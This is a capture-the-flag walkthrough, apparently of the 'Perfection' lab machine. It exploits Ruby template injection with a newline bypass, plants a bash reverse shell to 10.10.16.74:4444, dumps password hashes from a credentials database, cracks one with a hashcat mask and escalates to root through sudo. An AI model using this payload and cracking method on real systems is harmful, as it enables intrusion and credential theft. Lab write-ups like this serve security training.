Website allows us to calculate weights:
After playing around with parameter it seems like logic of code checks only first line with some kind of regex, injecting new line and SSTI payload shows result:
Last updated
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 16:37:00 GMT
Content-Type: text/html;charset=utf-8
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Content-Length: 5304<%= `bash -c 'exec bash -i &>/dev/tcp/10.10.16.74/4444 <&1'` %>
---
%0A%3C%25%3D%20%60bash%20%2Dc%20%27exec%20bash%20%2Di%20%26%3E%2Fdev%2Ftcp%2F10%2E10%2E16%2E74%2F4444%20%3C%261%27%60%20%25%3E┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ pwncat -lp 4444
[12:49:48] Welcome to pwncat 🐈! __main__.py:164
[12:49:55] received connection from 10.10.11.253:44456 bind.py:84
[12:49:58] 10.10.11.253:44456: registered new host w/ db manager.py:957
(local) pwncat$
(remote) susan@perfection:/home/susan/ruby_app$ id
uid=1001(susan) gid=1001(susan) groups=1001(susan),27(sudo)
(remote) susan@perfection:/home/susan/ruby_app$ (remote) susan@perfection:/home/susan$ cat user.txt
07bfcbde41110ef6e7077d6ad3ecef4c(remote) susan@perfection:/home/susan$ cd /var/mail
(remote) susan@perfection:/var/mail$ cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be convered into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful student(remote) susan@perfection:/home/susan/Migration$ ls
pupilpath_credentials.db
(remote) susan@perfection:/home/susan/Migration$ sqlite3 pupilpath_credentials.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .table
users
sqlite> .mode json
sqlite> SELECT * FROM users;
[{"id":1,"name":"Susan Miller","password":"abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f"},
{"id":2,"name":"Tina Smith","password":"dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57"},
{"id":3,"name":"Harry Tyler","password":"d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393"},
{"id":4,"name":"David Lawrence","password":"ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a"},
{"id":5,"name":"Stephen Locke","password":"154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8"}]┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ hashcat -m 1400 -a 3 password 'susan_nasus_?d?d?d?d?d?d?d?d?d'
...
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
...susan@perfection:~$ sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User susan may run the following commands on perfection:
(ALL : ALL) ALL
susan@perfection:~$ sudo su
root@perfection:/home/susan# cd
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
4559e764aba051c61c10ed9abca32dfe